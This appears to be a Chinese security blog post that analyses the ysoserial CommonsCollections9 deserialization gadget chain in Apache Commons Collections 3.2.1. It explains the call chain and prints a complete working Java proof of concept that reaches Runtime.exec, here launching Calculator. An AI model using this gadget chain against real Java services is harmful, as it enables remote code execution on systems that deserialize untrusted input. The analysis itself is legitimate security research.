Ananaskr's Blog
0%

ysoserial分析之CommonsCollections9

Posted on Edited on In

这篇文章要分析的是CommonsCollections9,根据wh1t3p1g师傅的收集,找到了梅子酒师傅提交的CommonsCollections9。它利用了3.2.1版本中的DefaultedMap

前面已经分析了:
ysoserial分析之CommonsCollections1
ysoserial分析之CommonsCollections2
ysoserial分析之CommonsCollections3
ysoserial分析之CommonsCollections4
ysoserial分析之CommonsCollections5
ysoserial分析之CommonsCollections6
ysoserial分析之CommonsCollections7
ysoserial分析之CommonsCollections8

梅子酒师傅提交的CommonsCollections9利用的是commonscollections:3.2版本新增加的DefaultedMap类来替代LazyMap。因为这两个类中的get函数具有类似的作用。作者表明只能在JDK8u76成功,实际上,在jdk1.8.0_111也能成功?

利用条件

  • commonscollections:3.2.1
  • 未配置security-manager

先来看看整个的利用链

1
2
3
4
5
6
BadAttributeValueExpException.readObject()
  ->TiedMapEntry.toString()
    ->DefaultedMap.get()
      ->ChainedTransformer.transform()
        ->ConstantTransformer.transform()
        ->InvokerTransformer.transform()

利用链分析及payload构造

从payload的整个利用链可以看出,整个链的构造和CommonsCollections5很相似,都是利用了BadAttributeValueExpException作为最外层。不同的只有中间的DefaultedMap类,那么就从分析这个类开始。定位到这个类的get函数

在函数里会调用((Transformer)this.value).transform(key),当this.value为构造的ChainedTransformer对象时,就可以RCE了。而这个value在DefaultedMap实例化时传入的参数。如下代码

1
2
Map map = new HashMap();
Map defaultedMap = DefaultedMap.decorate(map,transformer);

然后其余的与CommonsCollections5一致,完整的demo如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.DefaultedMap;


import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;


public class test {


    public static void main(String[] args) throws Exception{

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/Applications/Calculator.app/Contents/MacOS/Calculator"})

        };

        ChainedTransformer transformer  = new ChainedTransformer(transformers);

        Map map = new HashMap();
        Map defaultedMap = DefaultedMap.decorate(map,transformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(defaultedMap,1);

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field field = val.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(val,tiedMapEntry);
        
         ByteArrayOutputStream baos = new ByteArrayOutputStream();
         ObjectOutputStream out = new ObjectOutputStream(baos);
         out.writeObject(val);
         out.flush();
         out.close();

         byte[] bytes = baos.toByteArray();

         ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
         ObjectInputStream in = new ObjectInputStream(bais);
         in.readObject();
         in.close();

        }
}

运行的结果如下所示:

参考